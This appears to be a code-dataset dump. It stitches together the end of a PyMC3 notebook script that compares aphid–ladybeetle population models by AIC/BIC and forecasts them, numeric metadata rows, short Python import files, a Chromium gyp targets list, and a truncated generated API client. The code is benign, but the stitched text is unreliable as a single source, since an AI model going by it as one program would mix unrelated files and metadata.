) -> pd.DataFrame:
compare_result = {
'model': list(),
'AIC': list(),
}
for model_name in models_to_compare:
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
model_aic_scores = calculate_aic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aic_mpv = _scalar_rv_mvp_estimation(model_aic_scores)
compare_result['model'].append(model_name)
compare_result['AIC'].append(model_aic_mpv)
df_compare_results = pd.DataFrame(compare_result)
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=['AIC'], ascending=True, inplace=True)
return df_compare_results
def compare_aicc(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray
) -> pd.DataFrame:
compare_result = {
'model': list(),
'AICc': list(),
}
for model_name in models_to_compare:
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
model_aicc_scores = calculate_aicc_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aicc_mpv = _scalar_rv_mvp_estimation(model_aicc_scores)
compare_result['model'].append(model_name)
compare_result['AICc'].append(model_aicc_mpv)
df_compare_results = pd.DataFrame(compare_result)
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=['AICc'], ascending=True, inplace=True)
return df_compare_results
def compare_bic(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray
) -> pd.DataFrame:
compare_result = {
'model': list(),
'BIC': list(),
}
for model_name in models_to_compare:
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
model_bic_scores = calculate_bic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_bic_mpv = _scalar_rv_mvp_estimation(model_bic_scores)
compare_result['model'].append(model_name)
compare_result['BIC'].append(model_bic_mpv)
df_compare_results = pd.DataFrame(compare_result)
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=['BIC'], ascending=True, inplace=True)
return df_compare_results
def compare_ic(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray,
ic_to_sort: str = 'AIC'
) -> pd.DataFrame:
# Dict to store results
compare_result = {
'model': list(),
'AIC': list(),
'AICc': list(),
'BIC': list(),
}
# Calculate Information Criteria
for model_name in models_to_compare:
compare_result['model'].append(model_name)
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
# Compute AIC score
model_aic_scores = calculate_aic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aic_mpv = _scalar_rv_mvp_estimation(model_aic_scores)
compare_result['AIC'].append(model_aic_mpv)
# Compute AICc score
model_aicc_scores = calculate_aicc_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aicc_mpv = _scalar_rv_mvp_estimation(model_aicc_scores)
compare_result['AICc'].append(model_aicc_mpv)
# Compute BIC score
model_bic_scores = calculate_bic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_bic_mpv = _scalar_rv_mvp_estimation(model_bic_scores)
compare_result['BIC'].append(model_bic_mpv)
# Gathering results in a DataFrame
df_compare_results = pd.DataFrame(compare_result)
# Calculate relative likelihoods
available_ICs = ['AIC', 'AICc', 'BIC']
for ic in available_ICs:
ic_array = np.array(compare_result[ic])
min_ic_value = ic_array.min()
ic_relative_likelihoods = np.exp((min_ic_value - ic_array) / 2)
df_compare_results[f'weight_{ic}'] = ic_relative_likelihoods
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=[ic_to_sort], ascending=True, inplace=True)
return df_compare_results
# In[ ]:
models_to_compare = {
# Model names have to be the same as used in PyMC3 sampling
"CP1_model": trace_calibration_CP1,
"CP2_model": trace_calibration_CP2,
"CP3_model": trace_calibration_CP3,
"EP1_model": trace_calibration_EP1,
"EP2_model": trace_calibration_EP2,
"EP3_model": trace_calibration_EP3,
"LP1_model": trace_calibration_LP1,
"LP2_model": trace_calibration_LP2,
"LP3_model": trace_calibration_LP3,
"AP1_model": trace_calibration_AP1,
"AP2_model": trace_calibration_AP2,
"AP3_model": trace_calibration_AP3,
}
# Num of calibrated parameters for each model
models_num_of_parameters = {
# Model names have to be the same as used in PyMC3 sampling
"CP1_model": 3,
"CP2_model": 4,
"CP3_model": 4,
"EP1_model": 3,
"EP2_model": 4,
"EP3_model": 4,
"LP1_model": 3,
"LP2_model": 5,
"LP3_model": 4,
"AP1_model": 5,
"AP2_model": 4,
"AP3_model": 5,
}
df_compare_aic = compare_aic(
models_to_compare,
models_num_of_parameters,
observations_to_fit
)
df_compare_aic
# In[ ]:
df_compare_bic = compare_bic(
models_to_compare,
models_num_of_parameters,
observations_to_fit
)
df_compare_bic
# In[ ]:
df_compare_ic = compare_ic(
models_to_compare,
models_num_of_parameters,
observations_to_fit
)
df_compare_ic
# In[ ]:
df_ic_values = df_compare_ic[['AIC', 'AICc', 'BIC']].T
df_ic_weights = df_compare_ic[['weight_AIC', 'weight_AICc', 'weight_BIC']].T
# In[ ]:
ax = df_ic_values.plot.bar(figsize=(8, 6), rot=0)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1), ncol=2)
plt.show()
# In[ ]:
ax = df_ic_weights.plot.bar(figsize=(8, 6), rot=0)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1), ncol=2)
plt.show()
# # Uncertainty propagation
# ## CP1 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_CP1 = copy.deepcopy(fine_model_CP1)
with fine_model_to_forecast_CP1:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_CP1,
var_names=["CP1_model"],
random_seed=seed
)["CP1_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_CP1.png", dpi=300)
plt.show()
# ## CP2 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_CP2 = copy.deepcopy(fine_model_CP2)
with fine_model_to_forecast_CP2:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_CP2,
var_names=["CP2_model"],
random_seed=seed
)["CP2_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_CP2.png", dpi=300)
plt.show()
# ## CP3 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_CP3 = copy.deepcopy(fine_model_CP3)
with fine_model_to_forecast_CP3:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_CP3,
var_names=["CP3_model"],
random_seed=seed
)["CP3_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_CP3.png", dpi=300)
plt.show()
# ## EP1 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_EP1 = copy.deepcopy(fine_model_EP1)
with fine_model_to_forecast_EP1:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_EP1,
var_names=["EP1_model"],
random_seed=seed
)["EP1_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_EP1.png", dpi=300)
plt.show()
# ## EP2 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_EP2 = copy.deepcopy(fine_model_EP2)
with fine_model_to_forecast_EP2:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_EP2,
var_names=["EP2_model"],
random_seed=seed
)["EP2_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_EP2.png", dpi=300)
plt.show()
# ## Forecast projections (EP3, LP1, LP2, LP3, AP1, AP2, AP3 models)
# In[ ]:
import copy


def _forecast_and_plot(model_name, fine_model, trace_calibration):
    """Sample posterior-predictive forecasts for one model and save the plot.

    Extends the observed time window by a 250-unit forecast horizon,
    draws trajectories from the calibration posterior, and plots the
    posterior mean with a 95% credible band for both state variables
    (column 0: aphid density, column 1: ladybeetle density).  The figure
    is written to ``img/projections_<model_name>.png``.

    Relies on module-level names defined earlier in the script:
    ``aphid_data``, ``time_observations``, ``aphid_observed``,
    ``ladybeetle_observed`` and ``seed``.

    Parameters
    ----------
    model_name : str
        Model label (e.g. ``"EP3"``); also the name of the deterministic
        variable inside the PyMC model and the output-file suffix.
    fine_model : pm.Model
        Calibrated PyMC model; deep-copied so the original stays intact.
    trace_calibration
        Posterior trace to draw predictive samples from.
    """
    var_name = model_name + "_model"
    t0 = aphid_data.Time.values.min()
    tf = aphid_data.Time.values.max()
    time_to_forecast = 250
    time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
    # Deep copy so updating the Data container does not mutate the
    # calibrated model used elsewhere.
    model_to_forecast = copy.deepcopy(fine_model)
    with model_to_forecast:
        # We update the Data container "time" with the forecast grid
        pm.set_data({"time": time_range_prediction})
        # Then we sample from the calibration posterior
        model_prediction = pm.sample_posterior_predictive(
            trace_calibration,
            var_names=[var_name],
            random_seed=seed
        )[var_name]
    mean_model_prediction = model_prediction.mean(axis=0)
    percentile_cut = 2.5  # 2.5/97.5 percentiles -> 95% credible interval
    credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
    credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
    plt.figure(figsize=(20, 2 * 5))
    # Top panel: aphid density (state column 0)
    plt.subplot(2, 1, 1)
    plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
    plt.plot(time_range_prediction, mean_model_prediction[:, 0], color='g', lw=4, label='Aphid mean (simulated)')
    plt.plot(time_range_prediction, credible_lower[:, 0], '--', color='g', lw=2, label='Credible intervals')
    plt.plot(time_range_prediction, credible_upper[:, 0], '--', color='g', lw=2)
    plt.legend(fontsize=15, shadow=True)
    plt.xlabel('Time', fontsize=15)
    plt.ylabel('Aphid density', fontsize=15)
    # Bottom panel: ladybeetle density (state column 1)
    plt.subplot(2, 1, 2)
    plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
    plt.plot(time_range_prediction, mean_model_prediction[:, 1], color='b', lw=4, label='Ladybeetle mean (simulated)')
    plt.plot(time_range_prediction, credible_lower[:, 1], '--', color='b', lw=2, label='Credible intervals')
    plt.plot(time_range_prediction, credible_upper[:, 1], '--', color='b', lw=2)
    plt.legend(fontsize=15, shadow=True)
    plt.ylabel('Ladybeetle density', fontsize=15)
    plt.xlabel('Time', fontsize=15)
    plt.tight_layout()
    plt.savefig("img/projections_" + model_name + ".png", dpi=300)
    plt.show()


# One forecast per calibrated model, in the same order as the original
# per-model sections, so the saved figures and displayed plots are identical.
for _name, _model, _trace in [
    ("EP3", fine_model_EP3, trace_calibration_EP3),
    ("LP1", fine_model_LP1, trace_calibration_LP1),
    ("LP2", fine_model_LP2, trace_calibration_LP2),
    ("LP3", fine_model_LP3, trace_calibration_LP3),
    ("AP1", fine_model_AP1, trace_calibration_AP1),
    ("AP2", fine_model_AP2, trace_calibration_AP2),
    ("AP3", fine_model_AP3, trace_calibration_AP3),
]:
    _forecast_and_plot(_name, _model, _trace)
# In[ ]:
| 25.721539
| 282
| 0.682839
| 54,803
| 389,064
| 4.553619
| 0.017773
| 0.007073
| 0.009593
| 0.021318
| 0.963122
| 0.957604
| 0.951898
| 0.947378
| 0.939472
| 0.930592
| 0
| 0.035909
| 0.189876
| 389,064
| 15,125
| 283
| 25.72324
| 0.755843
| 0.106396
| 0
| 0.855387
| 0
| 0
| 0.080638
| 0.019066
| 0.00125
| 0
| 0
| 0
| 0
| 1
| 0.011982
| false
| 0
| 0.020108
| 0
| 0.042821
| 0.01021
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d9d88f17fc28810c68c615d6f4f99c923892e18
| 125
|
py
|
Python
|
pyscf/neo/pbc/__init__.py
|
xu-xi/pyscf
|
96191960d8a96956264b811eb34268eee53af586
|
[
"Apache-2.0"
] | null | null | null |
pyscf/neo/pbc/__init__.py
|
xu-xi/pyscf
|
96191960d8a96956264b811eb34268eee53af586
|
[
"Apache-2.0"
] | null | null | null |
pyscf/neo/pbc/__init__.py
|
xu-xi/pyscf
|
96191960d8a96956264b811eb34268eee53af586
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env/python
from pyscf.neo.pbc.cell import Cell
from pyscf.neo.pbc.hf import HF
from pyscf.neo.pbc.khf import KHF
| 20.833333
| 35
| 0.768
| 25
| 125
| 3.84
| 0.48
| 0.28125
| 0.375
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112
| 125
| 5
| 36
| 25
| 0.864865
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7dc0ae3f18451b26cd8a8f16218dc469e476bbf3
| 190
|
py
|
Python
|
pandases/operators/__init__.py
|
bearrundr/pandases
|
1aff63b8a6da4bfb42abb1d9d22b94e06a8f3520
|
[
"MIT"
] | null | null | null |
pandases/operators/__init__.py
|
bearrundr/pandases
|
1aff63b8a6da4bfb42abb1d9d22b94e06a8f3520
|
[
"MIT"
] | null | null | null |
pandases/operators/__init__.py
|
bearrundr/pandases
|
1aff63b8a6da4bfb42abb1d9d22b94e06a8f3520
|
[
"MIT"
] | 1
|
2020-07-27T11:38:25.000Z
|
2020-07-27T11:38:25.000Z
|
# -*- coding: UTF-8 -*-
from pandases.operators.aggregator import *
from pandases.operators.grouper import *
from pandases.operators.filter import *
from pandases.operators.sorter import *
| 27.142857
| 43
| 0.773684
| 23
| 190
| 6.391304
| 0.478261
| 0.326531
| 0.571429
| 0.55102
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005952
| 0.115789
| 190
| 6
| 44
| 31.666667
| 0.869048
| 0.110526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8160a91534f757de6780ce142427f1001c5b3861
| 4,892
|
gyp
|
Python
|
ui/file_manager/externs/compiled_resources2.gyp
|
metux/chromium-deb
|
3c08e9b89a1b6f95f103a61ff4f528dbcd57fc42
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
ui/file_manager/externs/compiled_resources2.gyp
|
metux/chromium-deb
|
3c08e9b89a1b6f95f103a61ff4f528dbcd57fc42
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
ui/file_manager/externs/compiled_resources2.gyp
|
metux/chromium-deb
|
3c08e9b89a1b6f95f103a61ff4f528dbcd57fc42
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
########################################################
# NOTE: THIS FILE IS GENERATED. DO NOT EDIT IT! #
# Instead, run create_include_gyp.py to regenerate it. #
########################################################
{
'targets': [
{
'target_name': 'app_window_common',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'audio_player_foreground',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'background_window',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_cast',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_echo_private',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_file_browser_handler',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_test',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'chrome_webstore_widget_private',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'command_handler_deps',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'connection',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'css_rule',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'directory_change_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'drag_target',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'entries_changed_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'entry_location',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'es6_workaround',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'exif_entry',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'file_operation_progress_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'files_elements',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'gallery_background',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'gallery_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'gallery_foreground',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'html_menu_item_element',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'launcher_search_provider',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'menu_item_update_event',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'metadata_worker_window',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'paper_elements',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'platform',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'platform_worker',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'search_item',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'volume_info',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'volume_info_list',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'volume_manager',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
{
'target_name': 'webview_tag',
'includes': ['../../../third_party/closure_compiler/include_js.gypi'],
},
],
}
| 32.832215
| 76
| 0.575838
| 472
| 4,892
| 5.567797
| 0.222458
| 0.129376
| 0.232877
| 0.32344
| 0.789193
| 0.789193
| 0.789193
| 0.789193
| 0.77169
| 0.77169
| 0
| 0.001269
| 0.194603
| 4,892
| 148
| 77
| 33.054054
| 0.665736
| 0.053557
| 0
| 0.242857
| 0
| 0
| 0.670215
| 0.453316
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8166dbd3fd14e0efce08a2a3597ce1f90e935903
| 7,539
|
py
|
Python
|
src/domainClient/api/me_api.py
|
diabolical-ninja/smart-property-search
|
0931c7c8195ec21cbd56768c9c84cea2927a9e1d
|
[
"MIT"
] | 5
|
2021-04-12T04:10:42.000Z
|
2021-04-28T05:54:22.000Z
|
src/domainClient/api/me_api.py
|
diabolical-ninja/smart-property-search
|
0931c7c8195ec21cbd56768c9c84cea2927a9e1d
|
[
"MIT"
] | 35
|
2020-05-26T14:21:37.000Z
|
2022-03-29T16:14:42.000Z
|
src/domainClient/api/me_api.py
|
diabolical-ninja/smart-property-search
|
0931c7c8195ec21cbd56768c9c84cea2927a9e1d
|
[
"MIT"
] | 2
|
2020-05-26T14:02:12.000Z
|
2022-01-10T08:19:49.000Z
|
# coding: utf-8
"""
Domain Group API V1
Provides public access to Domain's microservices # noqa: E501
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from domainClient.api_client import ApiClient
class MeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def me_get_my_agencies(self, **kwargs): # noqa: E501
"""Retrieves summary agency information associated to the current user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_agencies(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainPublicAdapterWebApiModelsV1AgenciesBriefAgencySummary]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.me_get_my_agencies_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.me_get_my_agencies_with_http_info(**kwargs) # noqa: E501
return data
def me_get_my_agencies_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves summary agency information associated to the current user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_agencies_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainPublicAdapterWebApiModelsV1AgenciesBriefAgencySummary]
